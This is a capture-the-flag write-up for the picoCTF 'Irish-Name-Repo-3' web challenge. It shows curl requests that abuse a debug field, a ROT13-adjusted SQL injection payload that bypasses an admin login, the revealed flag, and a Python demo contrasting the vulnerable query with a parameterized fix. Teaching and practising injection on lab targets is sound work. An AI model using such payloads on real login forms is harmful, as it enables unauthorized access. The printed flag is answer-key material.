Irish-Name-Repo-3

Point: 400

Category

Web Exploitation

Question

There is a secure website running at https://2019shell1.picoctf.com/problem/12271/ (link) or http://2019shell1.picoctf.com:12271. Try to see if you can login as admin!

Hint

Seems like the password is encrypted.

Solution

I tried to use the same solution as in Irish-Name-Repo 1 and Irish-Name-Repo 2, but it wasn't working.

The website offered an admin login page:

<!doctype html>
<html>
<head>
    <title>Login</title>
    <link rel="stylesheet" type="text/css" href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
</head>
<body>
<div class="container">
    <div class="row">
        <div class="col-md-12">
            <div class="panel panel-primary" style="margin-top:50px">
                <div class="panel-heading">
                    <h3 class="panel-title">Admin Log In</h3>
                </div>
                <div class="panel-body">
                    <form action="login.php" method="POST">
                        <fieldset>
                            <div class="form-group">

                                <label for="password">Password:</label>
                                <div class="controls">
                                    <input type="password" id="password" name="password" class="form-control">
                                </div>
                            </div>
                            <input type="hidden" name="debug" value="0">

                            <div class="form-actions">
                                <input type="submit" value="Login" class="btn btn-primary">
                            </div>
                        </fieldset>
                    </form>
                </div>
            </div>
        </div>
    </div>
</div>
</body>
</html>

Then I used the debug interface to test.

At first, I tried password=abc with debug=1, and the response came back with password=nop.

root@kali: curl "https://2019shell1.picoctf.com/problem/12271/login.php" --data "password=abc & debug=1"
<pre>password: abc
SQL query: SELECT * FROM admin where password = 'nop '
</pre><h1>Login failed.</h1>

As the hint said, I knew the password was encrypted. This might be a substitution cipher. So, I decided to try a simple injection. I changed the password parameter to password=' OR 1=1--, and I got SELECT * FROM admin where password = '' be 1=1 '

root@kali: curl "https://2019shell1.picoctf.com/problem/12271/login.php" --data "password=' or 1=1--' & debug=1"
<pre>password: ' or 1=1
SQL query: SELECT * FROM admin where password = '' be 1=1 '
</pre>

Finally, I changed password=' OR 1=1-- to password=' be 1=1--. BOOM!!! I got the flag:

root@kali:  curl "https://2019shell1.picoctf.com/problem/12271/login.php" --data "password=' be 1=1-- & debug=1"
<pre>password: ' be 1=1--
SQL query: SELECT * FROM admin where password = '' or 1=1-- '
</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{3v3n_m0r3_SQL_ef7eac2f}</p>
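The debug output above shows the whole mechanism: the server rewrites the submitted password letter by letter (abc becomes nop, which is ROT13) and then splices the result straight into the SQL string. The following is an added example, not code from the writeup or from picoCTF, that reproduces this pattern against an in-memory SQLite table, contrasts it with a parameterized query, and shows why the plain ' or 1=1-- payload fails (it is rewritten to the nonsense keyword be) while the pre-rotated ' be 1=1-- payload lands as valid SQL. The table name and column come from the query printed on the page; the stored password value and the function names are constructed for this demo.

```python
"""
Added example (not part of the writeup): a login routine that ROT13s the
submitted password and then concatenates it into SQL, exactly as the debug
output on the page reveals, beside a parameterized version.
The admin row's stored password is a constructed fixture.
"""
import codecs
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed fixture: one admin row. The stored value is the ROT13 of the
    # real password, matching the transformation the debug interface shows.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, password TEXT)")
    conn.execute(
        "INSERT INTO admin (password) VALUES (?)",
        (codecs.encode("s3cret-pass", "rot_13"),),  # stored as 'f3perg-cnff'
    )
    conn.commit()
    return conn


def vulnerable_query(password: str) -> str:
    # Mirrors what the page's debug output prints: ROT13 first, then the
    # encoded value is dropped into the query with plain string formatting.
    encoded = codecs.encode(password, "rot_13")
    return f"SELECT * FROM admin where password = '{encoded}'"


def vulnerable_login(conn: sqlite3.Connection, password: str) -> bool:
    # A query that no longer parses (e.g. the keyword 'be') simply fails the
    # login, which is the "Login failed" branch in the writeup.
    try:
        rows = conn.execute(vulnerable_query(password)).fetchall()
    except sqlite3.Error:
        return False
    return len(rows) > 0


def safe_login(conn: sqlite3.Connection, password: str) -> bool:
    # Hardened version: the ROT13'd password is bound as a parameter, so quotes,
    # keywords and the '--' comment marker stay inside the compared value.
    encoded = codecs.encode(password, "rot_13")
    rows = conn.execute(
        "SELECT * FROM admin WHERE password = ?", (encoded,)
    ).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    db = build_db()
    for pw in ("abc", "' or 1=1--", "' be 1=1--", "s3cret-pass"):
        print(f"{pw!r:16} -> {vulnerable_query(pw)}")
        print(f"{'':16}    vulnerable={vulnerable_login(db, pw)} "
              f"parameterized={safe_login(db, pw)}")
```

The point to take away is that a substitution step applied to the input is not an injection defence: it only changes which bytes the attacker has to send, because SQLite (like MySQL) treats the rotated `' or 1=1--` as a quote close, a tautology and a line comment. Binding the value as a parameter removes the problem regardless of what transformation precedes it.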

Flag

picoCTF{3v3n_m0r3_SQL_ef7eac2f}
